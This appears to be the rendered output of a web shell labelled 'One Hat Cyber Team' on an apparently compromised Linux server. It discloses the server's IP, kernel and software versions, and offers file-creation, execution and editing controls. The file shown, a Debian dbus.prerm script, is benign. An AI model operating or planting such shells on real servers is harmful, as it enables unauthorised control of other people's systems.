One Hat Cyber Team
Your IP :
18.222.24.251
Server IP :
104.21.32.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
thread-self
/
root
/
var
/
lib
/
dpkg
/
info
/
Edit File:
dbus.prerm
#!/bin/sh set -e if [ -d /run/systemd/system ] && [ "$1" = remove ]; then # Before stopping dbus-daemon, ensure that it won't just be # reactivated by dbus.socket. The "invoke-rc.d dbus stop" # added by debhelper, below, will harmlessly not do anything. deb-systemd-invoke stop dbus.socket dbus.service || exit $? fi # Automatically added by dh_installdeb/13.6ubuntu1 dpkg-maintscript-helper rm_conffile /etc/dbus-1/session.conf 1.10.0-4\~ dbus -- "$@" dpkg-maintscript-helper rm_conffile /etc/dbus-1/system.conf 1.10.0-4\~ dbus -- "$@" # End automatically added section exit 0
Simpan